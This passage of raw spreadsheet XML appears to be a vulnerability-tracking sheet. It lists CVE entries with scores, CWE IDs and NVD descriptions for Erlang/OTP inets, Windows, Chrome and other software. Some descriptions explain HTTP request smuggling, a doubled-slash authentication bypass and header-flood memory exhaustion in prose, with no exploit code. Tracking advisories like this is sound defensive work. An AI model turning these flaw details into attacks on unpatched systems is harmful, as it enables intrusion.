r="C605" s="5" t="inlineStr"><is><t>CVE-2026-66357</t></is></c><c r="D605" s="5" t="n"><v>8.300000000000001</v></c><c r="E605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F605" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G605" s="5" t="inlineStr" /><c r="H605" s="5" t="n"><v>0.003</v></c><c r="I605" s="5" t="inlineStr" /><c r="J605" s="5" t="inlineStr" /><c r="K605" s="5" t="inlineStr" /><c r="L605" s="5" t="inlineStr" /><c r="M605" s="5" t="inlineStr" /><c r="N605" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O605" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P605" s="5" t="inlineStr" /><c r="Q605" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R605" s="5" t="inlineStr"><is><t>httpd has never implemented obs-fold (RFC 2616 §2.2 / RFC 7230 §3.2.4 header continuation lines). Every CRLF followed by a non-CRLF octet unconditionally starts a new header. This missing feature became a security concern as the understanding of HTTP request smuggling attacks evolved.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605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66357</t></is></c></row><row r="606"><c r="A606" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C606" s="5" t="inlineStr"><is><t>CVE-2026-69646</t></is></c><c r="D606" s="5" t="n"><v>8.300000000000001</v></c><c r="E606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F606" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G606" s="5" t="inlineStr" /><c r="H606" s="5" t="n"><v>0.002</v></c><c r="I606" s="5" t="inlineStr" /><c r="J606" s="5" t="inlineStr" /><c r="K606" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L606" s="5" t="inlineStr" /><c r="M606" s="5" t="inlineStr" /><c r="N606" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P606" s="5" t="inlineStr" /><c r="Q606" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R606" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="S606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t></is></c></row><row r="607"><c r="A607" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B607" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C607" s="5" t="inlineStr"><is><t>CVE-2026-73276</t></is></c><c r="D607" s="5" t="n"><v>8.300000000000001</v></c><c r="E607" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F607" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G607" s="5" t="inlineStr" /><c r="H607" s="5" t="n"><v>0.003</v></c><c r="I607" s="5" t="inlineStr" /><c r="J607" s="5" t="inlineStr" /><c r="K607" s="5" t="inlineStr" /><c r="L607" s="5" t="inlineStr" /><c r="M607" s="5" t="inlineStr" /><c r="N607" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O607" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P607" s="5" t="inlineStr" /><c r="Q607" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R607" s="5" t="inlineStr"><is><t>Gracefulness code ignored cases that should be rejected, resulting in possible HTTP Request Smuggling opportunities.

This issue affects OTP from OTP 22.2 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to inets from 7.1.2 before 9.3.2.7, from 9.4 before 9.6.2.3, and from 9.7 before 9.7.2.</t></is></c><c r="S607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73276</t></is></c></row><row r="608"><c r="A608" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B608" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C608" s="5" t="inlineStr"><is><t>CVE-2026-73812</t></is></c><c r="D608" s="5" t="n"><v>8.300000000000001</v></c><c r="E608" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F608" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G608" s="5" t="inlineStr" /><c r="H608" s="5" t="n"><v>0.003</v></c><c r="I608" s="5" t="inlineStr" /><c r="J608" s="5" t="inlineStr" /><c r="K608" s="5" t="inlineStr" /><c r="L608" s="5" t="inlineStr" /><c r="M608" s="5" t="inlineStr" /><c r="N608" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O608" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P608" s="5" t="inlineStr" /><c r="Q608" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R608" s="5" t="inlineStr"><is><t>httpd function check_header/3 rejects duplicate Content-Length (per CVE-2026-23941) but never checks for the TE+CL co-presence that RFC 9112 §6.3 identifies as a probable smuggling attempt. handle_body/3 frames by chunked and silently discards Content-Length. A CL-preferring front-end paired with chunked-preferring inets creates a classic CL.TE front-end/back-end desync.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608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73812</t></is></c></row><row r="609"><c r="A609" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B609" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C609" s="5" t="inlineStr"><is><t>CVE-2026-76225</t></is></c><c r="D609" s="5" t="n"><v>8.300000000000001</v></c><c r="E609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F609" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G609" s="5" t="inlineStr" /><c r="H609" s="5" t="n"><v>0.003</v></c><c r="I609" s="5" t="inlineStr" /><c r="J609" s="5" t="inlineStr" /><c r="K609" s="5" t="inlineStr" /><c r="L609" s="5" t="inlineStr" /><c r="M609" s="5" t="inlineStr" /><c r="N609" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O609" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P609" s="5" t="inlineStr" /><c r="Q609" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R609" s="5" t="inlineStr"><is><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is></c><c r="S609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76225</t></is></c></row><row r="610"><c r="A610" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C610" s="5" t="inlineStr"><is><t>CVE-2026-81821</t></is></c><c r="D610" s="5" t="n"><v>8.300000000000001</v></c><c r="E610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F610" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G610" s="5" t="inlineStr" /><c r="H610" s="5" t="n"><v>0.001</v></c><c r="I610" s="5" t="inlineStr" /><c r="J610" s="5" t="inlineStr" /><c r="K610" s="5" t="inlineStr" /><c r="L610" s="5" t="inlineStr" /><c r="M610" s="5" t="inlineStr" /><c r="N610" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P610" s="5" t="inlineStr" /><c r="Q610" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="R610" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t></is></c><c r="S610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t></is></c></row><row r="611"><c r="A611" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C611" s="5" t="inlineStr"><is><t>CVE-2026-81822</t></is></c><c r="D611" s="5" t="n"><v>8.300000000000001</v></c><c r="E611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F611" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G611" s="5" t="inlineStr" /><c r="H611" s="5" t="n"><v>0.001</v></c><c r="I611" s="5" t="inlineStr" /><c r="J611" s="5" t="inlineStr" /><c r="K611" s="5" t="inlineStr" /><c r="L611" s="5" t="inlineStr" /><c r="M611" s="5" t="inlineStr" /><c r="N611" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P611" s="5" t="inlineStr" /><c r="Q611" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="R611" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t></is></c><c r="S611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t></is></c></row><row r="612"><c r="A612" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B612" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C612" s="5" t="inlineStr"><is><t>CVE-2026-82750</t></is></c><c r="D612" s="5" t="n"><v>8.300000000000001</v></c><c r="E612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F612" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G612" s="5" t="inlineStr" /><c r="H612" s="5" t="n"><v>0.003</v></c><c r="I612" s="5" t="inlineStr" /><c r="J612" s="5" t="inlineStr" /><c r="K612" s="5" t="inlineStr" /><c r="L612" s="5" t="inlineStr" /><c r="M612" s="5" t="inlineStr" /><c r="N612" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O612" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P612" s="5" t="inlineStr" /><c r="Q612" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R612" s="5" t="inlineStr"><is><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is></c><c r="S612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82750</t></is></c></row><row r="613"><c r="A613" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B613" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C613" s="5" t="inlineStr"><is><t>CVE-2026-82751</t></is></c><c r="D613" s="5" t="n"><v>8.300000000000001</v></c><c r="E613" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F613" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G613" s="5" t="inlineStr" /><c r="H613" s="5" t="n"><v>0.003</v></c><c r="I613" s="5" t="inlineStr" /><c r="J613" s="5" t="inlineStr" /><c r="K613" s="5" t="inlineStr" /><c r="L613" s="5" t="inlineStr" /><c r="M613" s="5" t="inlineStr" /><c r="N613" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O613" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P613" s="5" t="inlineStr" /><c r="Q613" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R613" s="5" t="inlineStr"><is><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is></c><c r="S613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82751</t></is></c></row><row r="614"><c r="A614" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B614" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C614" s="5" t="inlineStr"><is><t>CVE-2026-85048</t></is></c><c r="D614" s="5" t="n"><v>8.300000000000001</v></c><c r="E614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F614" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G614" s="5" t="inlineStr" /><c r="H614" s="5" t="n"><v>0.003</v></c><c r="I614" s="5" t="inlineStr" /><c r="J614" s="5" t="inlineStr" /><c r="K614" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L614" s="5" t="inlineStr" /><c r="M614" s="5" t="inlineStr" /><c r="N614" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O614" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P614" s="5" t="inlineStr" /><c r="Q614" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R614" s="5" t="inlineStr"><is><t>Use after free in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker who had compromised the renderer process to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85048</t></is></c></row><row r="615"><c r="A615" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B615" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C615" s="5" t="inlineStr"><is><t>CVE-2026-85538</t></is></c><c r="D615" s="5" t="n"><v>8.300000000000001</v></c><c r="E615" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F615" s="5" t="inlineStr"><is><t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t></is></c><c r="G615" s="5" t="inlineStr" /><c r="H615" s="5" t="n"><v>0.003</v></c><c r="I615" s="5" t="inlineStr" /><c r="J615" s="5" t="inlineStr" /><c r="K615" s="5" t="inlineStr" /><c r="L615" s="5" t="inlineStr" /><c r="M615" s="5" t="inlineStr" /><c r="N615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O615" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P615" s="5" t="inlineStr" /><c r="Q615" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R615" s="5" t="inlineStr"><is><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is></c><c r="S615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85538</t></is></c></row><row r="616"><c r="A616" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B616" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C616" s="5" t="inlineStr"><is><t>CVE-2026-52767</t></is></c><c r="D616" s="5" t="n"><v>8.199999999999999</v></c><c r="E616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F616" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G616" s="5" t="inlineStr" /><c r="H616" s="5" t="n"><v>0.002</v></c><c r="I616" s="5" t="inlineStr" /><c r="J616" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K616" s="5" t="inlineStr" /><c r="L616" s="5" t="inlineStr" /><c r="M616" s="5" t="inlineStr" /><c r="N616" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O616" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P616" s="5" t="inlineStr" /><c r="Q616" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R616" s="5" t="inlineStr"><is><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is></c><c r="S616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52767</t></is></c></row><row r="617"><c r="A617" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B617" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C617" s="5" t="inlineStr"><is><t>CVE-2026-54600</t></is></c><c r="D617" s="5" t="n"><v>8.199999999999999</v></c><c r="E617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F617" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G617" s="5" t="inlineStr" /><c r="H617" s="5" t="n"><v>0.003</v></c><c r="I617" s="5" t="inlineStr" /><c r="J617" s="5" t="inlineStr" /><c r="K617" s="5" t="inlineStr" /><c r="L617" s="5" t="inlineStr" /><c r="M617" s="5" t="inlineStr" /><c r="N617" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O617" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P617" s="5" t="inlineStr" /><c r="Q617" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R617" s="5" t="inlineStr"><is><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is></c><c r="S617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54600</t></is></c></row><row r="618"><c r="A618" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B618" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C618" s="5" t="inlineStr"><is><t>CVE-2026-55951</t></is></c><c r="D618" s="5" t="n"><v>8.199999999999999</v></c><c r="E618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F618" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G618" s="5" t="inlineStr" /><c r="H618" s="5" t="n"><v>0.004</v></c><c r="I618" s="5" t="inlineStr" /><c r="J618" s="5" t="inlineStr" /><c r="K618" s="5" t="inlineStr" /><c r="L618" s="5" t="inlineStr" /><c r="M618" s="5" t="inlineStr" /><c r="N618" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O618" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P618" s="5" t="inlineStr" /><c r="Q618" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R618" s="5" t="inlineStr"><is><t>The Erlang/OTP httpc HTTP client does not enforce a limit on the total size of response headers received from a server. The max_header_size option defaults to nolimit, and httpc_response:parse_headers/6 accumulates every header into a list before the length check runs (which only fires after the terminating CRLF CRLF is received).

A malicious or compromised HTTP server can send an arbitrarily large number of headers, or headers with very large values, causing the client process to allocate unbounded memory until the system runs out of memory or the BEAM VM crashes. A proof-of-concept server sending 100,000 headers of roughly 4000 bytes each caused the client VM to allocate over 13 GB of memory in under 30 seconds.

Any application using httpc:request/4,5 to connect to untrusted servers is affected. No authentication is required: any server the client connects to (including via a redirect or man-in-the-middle) can trigger the exhaustion.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618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55951</t></is></c></row><row r="619"><c r="A619" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B619" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C619" s="5" t="inlineStr"><is><t>CVE-2026-61638</t></is></c><c r="D619" s="5" t="n"><v>8.199999999999999</v></c><c r="E619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F619" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G619" s="5" t="inlineStr" /><c r="H619" s="5" t="n"><v>0.003</v></c><c r="I619" s="5" t="inlineStr" /><c r="J619" s="5" t="inlineStr" /><c r="K619" s="5" t="inlineStr" /><c r="L619" s="5" t="inlineStr" /><c r="M619" s="5" t="inlineStr" /><c r="N619" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O619" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P619" s="5" t="inlineStr" /><c r="Q619" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R619" s="5" t="inlineStr"><is><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is></c><c r="S619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61638</t></is></c></row><row r="620"><c r="A620" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B620" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C620" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D620" s="5" t="n"><v>8.199999999999999</v></c><c r="E620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F620" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G620" s="5" t="inlineStr" /><c r="H620" s="5" t="n"><v>0.004</v></c><c r="I620" s="5" t="inlineStr" /><c r="J620" s="5" t="inlineStr" /><c r="K620" s="5" t="inlineStr" /><c r="L620" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M620" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N620" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O620" s="5" t="inlineStr" /><c r="P620" s="5" t="inlineStr" /><c r="Q620" s="5" t="inlineStr"><is><t>CWE-22, CWE-73, CWE-706</t></is></c><c r="R620"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S620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="621"><c r="A621" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B621" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C621" s="5" t="inlineStr"><is><t>CVE-2026-66835</t></is></c><c r="D621" s="5" t="n"><v>8.199999999999999</v></c><c r="E621" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F621" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G621" s="5" t="inlineStr" /><c r="H621" s="5" t="n"><v>0.006</v></c><c r="I621" s="5" t="inlineStr" /><c r="J621" s="5" t="inlineStr" /><c r="K621" s="5" t="inlineStr" /><c r="L621" s="5" t="inlineStr" /><c r="M621" s="5" t="inlineStr" /><c r="N621" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O621" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P621" s="5" t="inlineStr" /><c r="Q621" s="5" t="inlineStr"><is><t>CWE-50</t></is></c><c r="R621" s="5" t="inlineStr"><is><t>Path Equivalence vulnerability in Erlang/OTP inets httpd allows a remote unauthenticated attacker to read files inside a mod_auth protected directory by prefixing the request path with an extra slash.

httpd_request:validate_uri/1 normalises the request URI with uri_string:normalize/1, which performs RFC 3986 dot-segment removal but does not collapse empty path segments, so a doubled slash survives. mod_alias:real_name/3 concatenates the document root with that URI, and mod_auth:secret_path/3 then decides whether the result lies inside a protected directory block by running the configured directory path as an unanchored regular expression against it. The doubled slash breaks the contiguous substring the regex needs, so the request is treated as unprotected and no authentication challenge is issued, while mod_get opens the same path and the operating system collapses the doubled slash and returns the protected file. The same path mismatch also evades the per-path accounting in mod_security.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621" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66835</t></is></c></row><row r="622"><c r="A622" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C622" s="5" t="inlineStr"><is><t>CVE-2026-69846</t></is></c><c r="D622" s="5" t="n"><v>8.199999999999999</v></c><c r="E622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F622" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G622" s="5" t="inlineStr" /><c r="H622" s="5" t="n"><v>0.003</v></c><c r="I622" s="5" t="inlineStr" /><c r="J622" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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2" s="5" t="inlineStr" /><c r="M622" s="5" t="inlineStr" /><c r="N622" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P622" s="5" t="inlineStr" /><c r="Q622" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R622" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S622" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t></is></c></row><row r="623"><c r="A623" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C623" s="5" t="inlineStr"><is><t>CVE-2026-69906</t></is></c><c r="D623" s="5" t="n"><v>8.199999999999999</v></c><c r="E623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F623" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G623" s="5" t="inlineStr" /><c r="H623" s="5" t="n"><v>0.003</v></c><c r="I623" s="5" t="inlineStr" /><c r="J623" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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623" s="5" t="inlineStr" /><c r="M623" s="5" t="inlineStr" /><c r="N623" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P623" s="5" t="inlineStr" /><c r="Q623" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R623" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S623" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t></is></c></row><row r="624"><c r="A624" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C624" s="5" t="inlineStr"><is><t>CVE-2026-72958</t></is></c><c r="D624" s="5" t="n"><v>8.199999999999999</v></c><c r="E624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F624" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G624" s="5" t="inlineStr" /><c r="H624" s="5" t="n"><v>0.003</v></c><c r="I624" s="5" t="inlineStr" /><c r="J624" s="5" t="inlineStr" /><c r="K624" s="5" t="inlineStr" /><c r="L624" s="5" t="inlineStr" /><c r="M624" s="5" t="inlineStr" /><c r="N624" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P624" s="5" t="inlineStr" /><c r="Q624" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R624" s="5" t="inlineStr"><is><t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t></is></c></row><row r="625"><c r="A625" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C625" s="5" t="inlineStr"><is><t>CVE-2026-72961</t></is></c><c r="D625" s="5" t="n"><v>8.199999999999999</v></c><c r="E625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F625" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G625" s="5" t="inlineStr" /><c r="H625" s="5" t="n"><v>0.003</v></c><c r="I625" s="5" t="inlineStr" /><c r="J625" s="5" t="inlineStr" /><c r="K625" s="5" t="inlineStr" /><c r="L625" s="5" t="inlineStr" /><c r="M625" s="5" t="inlineStr" /><c r="N625" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P625" s="5" t="inlineStr" /><c r="Q625" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R625" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t></is></c></row><row r="626"><c r="A626" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C626" s="5" t="inlineStr"><is><t>CVE-2026-72962</t></is></c><c r="D626" s="5" t="n"><v>8.199999999999999</v></c><c r="E626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F626" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G626" s="5" t="inlineStr" /><c r="H626" s="5" t="n"><v>0.003</v></c><c r="I626" s="5" t="inlineStr" /><c r="J626" s="5" t="inlineStr" /><c r="K626" s="5" t="inlineStr" /><c r="L626" s="5" t="inlineStr" /><c r="M626" s="5" t="inlineStr" /><c r="N626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P626" s="5" t="inlineStr" /><c r="Q626" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R626" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t></is></c></row><row r="627"><c r="A627" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B627" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C627" s="5" t="inlineStr"><is><t>CVE-2026-73270</t></is></c><c r="D627" s="5" t="n"><v>8.199999999999999</v></c><c r="E627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F627" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G627" s="5" t="inlineStr" /><c r="H627" s="5" t="n"><v>0.007</v></c><c r="I627" s="5" t="inlineStr" /><c r="J627" s="5" t="inlineStr" /><c r="K627" s="5" t="inlineStr" /><c r="L627" s="5" t="inlineStr" /><c r="M627" s="5" t="inlineStr" /><c r="N627" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O627" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P627" s="5" t="inlineStr" /><c r="Q627" s="5" t="inlineStr"><is><t>CWE-178</t></is></c><c r="R627" s="5" t="inlineStr"><is><t>Improper Handling of Case Sensitivity vulnerability in Erlang/OTP inets httpd allows a remote unauthenticated attacker to read files inside a mod_auth protected directory by requesting them with different casing, on deployments whose filesystem is case-insensitive.

